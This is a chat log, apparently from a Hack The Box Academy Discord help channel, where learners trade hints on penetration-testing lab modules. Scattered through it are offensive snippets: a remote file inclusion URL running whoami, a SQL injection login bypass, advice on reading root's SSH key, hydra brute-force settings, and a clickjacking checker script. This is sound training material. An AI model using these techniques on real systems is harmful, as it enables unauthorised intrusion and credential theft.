Hello, I am currently on the File Inclusion module and the SMB portion does not seem to work for me. I have looked through the past comments and none of them are not working. Can someone point me in the right direction? I am using this command: http://<SERVER_IP>:<PORT>/index.php?language=\<OUR_IP>\share\shell.php&cmd=whoami I started impacket and made the directory called shel l and copied the php file into it. I have also tried:http://<SERVER_IP>:<PORT>/index.php?language=\<OUR_IP>\shell.php&cmd=whoami taking out the share directory. Is there something I am missing? Thank you in advance for your time.

https://academy.hackthebox.com/module/145/section/1295 Server-side Attacks - Nginx Reverse Proxy & AJP

Is there someone I could dm about some doubts please? I don't get it works

sure shoot me a dm if you still need help

which section are you on?

Anyone had issues with ssh service breaking on tunneling using icmp? I can ping the box but can't ssh in and my ssh session I had had died. Reverting the box allows you to login again for a couple of mins before breaking. Tested using kali vm and using the parrot attack box.

Hi, I am on the Remote Code Execution/ Remote File Inclusion (RFI)/ SMB section.

try a HTTP server instead of a SMB section

also it's not a SMB section

first you don't have both the pwnbox and your vpn on at the same time right?

I do.

I cant find anything

lol

hint ||history||

yea that's the issue

I used parrot to compile ptunnel as if you get compatability issues compiling on kali

Thanks mrtom

Ive checked the bash history and found nothing of interest

just some ||dickens|| file

lol

hint if you found something that can use as a passwod then that's the Fing flag

This worked. Thank You

yea you may want to remove this and the directory listing screenshot because of the spoiler and shoot me a dm with the stuff you found in the ||history|| file

Same. I finished it earlier this week after a bit of time. Research and syntax checks, as well as further searches on what I can do with the url got me to the finish.

Anyone around that has done case 5 in the sqlmap essentials module, the Attack Tuning section?

I've managed to get content to dump, but my flag is not being accepted, want to run what I have by someone and confirm if this is indeed incorrect...

DM me.

😭

I dont get it https://academy.hackthebox.com/module/33/section/799

I try following along and use admin'-- as the username and I get an error. Something so simple like this and it doesnt work

ITS RIGGED

Relax, you're just not thinking about what's going on behind the scenes. The goal of SQL injection is basically rewriting the query the app is making to the database to return something else.

In that first example, we don't know the password, so by injecting admin'-- -, we close out the quotes around the username, and use -- - as a comment to tell the query to ignore everything afterwards.

The second query is a bit different, because now we have parentheses in the mix. If you run the query with the payload from before, the parentheses aren't getting closed out, so the query errors out

right but I wasnt able to do the first one

I get the error in the second screenshot

Am I not supposed to follow along maybe?

You're not supposed to follow along, it's a different example

got it

It's a chump check to make sure you're not just copying and pasting

thanks!!!!

man I get so frustrated

Still on the Priv Esc bs trying to get the Root flag. I've pulled the id_rsa but now I'm confused. If I do how the lesson shows even with the CHMod the server refuses it saying (publickey) but if I do the specific port it asks for a password. Was I supposed to pull a different key or am I doing something wrong?

Can't help you without knowing the module and section

It's Getting Started -> Priveledge Escalation

and the comments?

No part of that walkthrough tells you to use an SSH key

Oh wait I was looking at nibbles, my bad

why u using the pub key

Yeah, you're supposed to use the private key for SSH

if u want to use the pub key u have to add it to /root/.ssh

Because I'm not able to cat the private key and that's what I had seen other people doing.

to use ur publick key

Unless I'm supposed to pull the private key using scp or something like that.

u are supposed the be able to read the id_rsa

Then am I looking in the wrong place? Because this is the only ssh directory on the machine.

look at the permissions on /root

RIGGED

just read what u sent lol

.

Now I'm even more confused...

ls -a

sorry, i am kinda slowly getting it. SQL is my weak point. Its embarrassing because it feels like it would be so easy

/etc/ssh is where SSH configuration files are stored, usually not where any keys are

Look at the permissions on /root

You'll get the hang of it soon enough, it's one of those things where you start out looking at references and documentation, then slowly understand the general process of it, without.

You can read up Portswigger's and Hacktrick's referencess on SQL injection if you want, i always just copy paste their commands in real CTFs/bbps anyways

i'm doing this question; attached is the hint, I'm running hydra to get the password ofc the hint given isn't the password. But what i wanted to know is how long is it gonna take hydra to get this password been running for 2hrs now and barely got anywhere

this section is blowing my mind lol is this what pentesters deal with me holy crap

please can some one help on how do i use this python file

from urllib.request import urlopen
from sys import argv, exit
import threading
from colorama import Fore

def check(url):
''' check given URL is vulnerable or not '''

try:
    if "http" not in url: url = "http://" + url

    data = urlopen(url,timeout=3)
    headers = data.info()

    if not "X-Frame-Options" in headers: return True
    if not "Content-Security-Policy" in headers: return True

except: return False

def listVulnerableSite(url):
f=open("Vulnerable.txt", "a+")
f.write(url+"\n")
f.close()

def main():
try: sites = open(argv[1], 'r').readlines()
except: print("[*] Usage: python3 clickjack.py <file_name>"); exit(0)

for site in sites[0:]:
    status = check(site)

    if status:
        print(Fore.RED+"[+] "+Fore.GREEN+site.split('\n')[0] +Fore.WHITE+ " is "+Fore.RED+"Vulnerable")
        listVulnerableSite(site.split('\n')[0])
    
    elif not status: print(Fore.CYAN+"[-] "+Fore.GREEN+site.split('\n')[0] +Fore.WHITE+ " is "+Fore.CYAN+" NOT Vulnerable")
    else: print(Fore.CYAN+'Every single thing is crashed, Python got mad, dude wtf you just did?')

if name == 'main': main()

if this isn't in a HTB academy module then you are asking at the wrong place

Does anyone has any info about it ?

like this better

didn't see the Fing clickjack.py

god fuckin damnit.

Found it. That's the info I needed no wonder I was so lost...

please explain to me in detail how do i use on vscode or where

keep asking for thing like that and you will get the 👢 my guy

how u doing boy

i paste it on my vs code but dont know what to do next

save it to a file called x.py & do python3 x.py

where do i put the link i wanna check or something i really need some explanation how did this work pleas

it will tell you

alright

execute it and read what asks

@azure shell this channels is for HTB academy related module only you can take your script kiddies ass to #general

my bad

pls don't show the dump ass how to run clickjack script he found online

😦

i mean if he want to learn he can ask here but pasting a clickjack script and asking how to run it isn't the right way to go

where do i learn it

starting by asking question

then that guy will think is a hacker for running a script he found in internet

thanks

read #welcome and #rules after that use /verify at #bot-commands if you are on HTB and ask your question in the appropriate channels

a good one tho: if "http" not in url: url = "http://" + url

it is actually good

if u are too lazy to write http:// it just do it for u

xd

I am

alright

good luck sir

@trail leaf @zinc marsh Thanks for the help.

thank you

sso any idea how long hydra gonna take ?

password cracking or hashcat module?

ah, hydra,

Okay, now I know why 😄

A cool module, but really not difficult.
It was fun to play with Wireshark

password cracking

im osrry for you my man

you can get a nap

lmfao

no way

wild module

indeed

don't remember if you are in a slow one but get ready

you love to see it

nah this is slow asf bro

https://media.discordapp.net/attachments/732550927378022440/1070026322493063199/ezgif.com-gif-maker.gif

use threads

it's depend on what wordlist you use

yea you should make some note on the modules that you've done

used the mut_passwordlist.txt and i shorten that list with the command you sent me

what's the command for threads?

forgot what command i send you but if it's for a section then it's meant to be only for that section

Question for the "Password Attacks Lab - Medium" ||Am I supposed to bruteforce the user named dennis over ssh?||

sed -e 1,17000d mut_password.list > short.txt

hydra -t 50 (as more threads you put more unstable it gets)

oh i did that put it at -t 64

then patience

still moving slower then a snail

@high reef hint make the ||mut list|| based on the given "cred" and the given rule

for me it's took 2 sec

listen the wise squirrel

how would i do that ?

hint if you got a shell as user j then do some enum

same command you make the mut wordlist just with the ||given cred|| in the hint this time

like this ?

i'll send you the one i used but you may want to remove this due to spoilers

Holy smoke that was a long time ago. I’m at 80 percent

Keep it up bro!

Anyone know why in Attacking GitLab from ATTACKING COMMON APPLICATIONS the trigger doesnt work for me?? I created a user and did as instructed

Thank you. Been hard stuck with pivot for awhile. Took alot@of time off to work on boxes and sharpen my@skills

How are you?

windows privesc, pillaging, 3rd question
there is no cookie "d", if i try to make one manually it does not work, how am i supposed to log in?

You can add cookies by opening dev tools

Should work if you do it manually

Because the Lab might be protected against it?
Without knowing in which module and in which section you are currently working, it is difficult to tell you more precisely.

Attacking common applications skills assessment is 👌

no way they say to try out RopeTwo after that module though

Fun practice 😂

the most you do with that one is open gitlab to find the patched chrome browser

Hey

I'm not sure why it does this. It's in ATTACKING COMMON APPLICATIONS >> Attacking Gitlab

it does not work, i tried both with devtools and cookie editor

Anyone here going after OSCP after they complete CPTS?

yes

hm, I'd love to help but I was just about to head out, so hopefully someone else can assist you here o7

in the middle of it

I am hoping that completing the CPTS will prepare me for the OSCP

If you need help feel free to DM

Great haha, idk how i ended on your message and u gave me good vibes 🙂

Thank you brother!

That should work.
Try it from the PwnBox

Have you purchased the offsec course or are you studying on your own using boxes from HTB?

Im doing their course too

I wanted to see how they compare

There is a course for roughly 5400.00 that incorporates the Offsec course but keeps you on a study schedule so that you can pass the OSCP in three months.

thats ridiculous

I need that structure in order to get out of this boring job

it is a lot I know

but if I can speed up my progress that is what I would be paying for

offsec has their own study schedule that you dont need to pay 5k for

Yo, just a quick question/sanity check
In the module „File Inclusion“, Section „Remote File Inclusion (RFI)“: Do I need to port forward my http/ftp/smb server? The RFI keeps giving me the error „No route to host“ even tho I am connected to the VPN and am using the IP address of the corresponding interface.

Ok, maybe I will take that path; after I finish the CPTS I need to get going with it

My connection was really buggy today, I wasn't sure why. I might try again in an hour and see if it's any different

If you've got that kind of money to burn, just get Unlimited 💀

That just allows from unlimited access, my goal is to get the OSCP asap to get a job in the field of penetration testing. What would you do with the unlimited subscription?

Try it. from the PwnBox

Got the same error earlier today from that.

Can‘t start it anymore until tomorrow. 😅

I will check again then.

Resolved! More than a couple of times it's been that, so weird. Wonder when will happen on the field!

Send me your attempt by DM.
Then I'll see if you're doing something wrong or if it's the lab

I'd get at least three certs from it, four if I really push it, but I don't have that kind of money. In any case, you really don't need to spend that, there's plenty of schedules you can follow both by offsec and recommendations from people who've done the exam

Will do, thank you.

The question is whether you can easily get a job with OSCP. I don't think it's that easy.

I am 44 years old, ran and sold my MSP, currently working for an insurance company dealing with ransomware events. I have a good amount of real world experience but am pivoting to penetration testing. Have been getting certification after certification in cyber security. I am hoping that with the OSCP this will be my shot in to a decent job and then allow my skills to further develop.

OSCP helps but the market sucks ass right now

5k is still too ridiculous for a study plan even if youve got money to burn.

at that price you better be getting 1 on 1 dedicated tutoring

What do you recommend if anything?

fwiw I finished CPTS and currently doing the offsec course. bit under 3 weeks in and despite taking an entire weekend off and a couple extra days cause I was sick, Im over 30% done with the entire course already

oh wow congratz, wish you all the best on your new journey (you have been blessed by the helpful squirrel)

i'm sorry what? how tf is that course 5 Fing K?

it isnt

someones selling him a study plan for 5k

oh wtf 🤣

right? maybe after I pass I should start a side hussle selling my study plan for 1k and undercut em 😂

Haha at

with the "leak" that i saw even a simple study plan for all of the free or cheap platform would be better or equal to damn course

Dont get me wrong, theres some things ive learned or liked from their newly updated materials, but it feels like panhandling for gold and Id probably have learned the same things just from doing more boxes.

the latest update was the only good update in while for the course but still 2.5K though

1599

you dont have to get the year long sub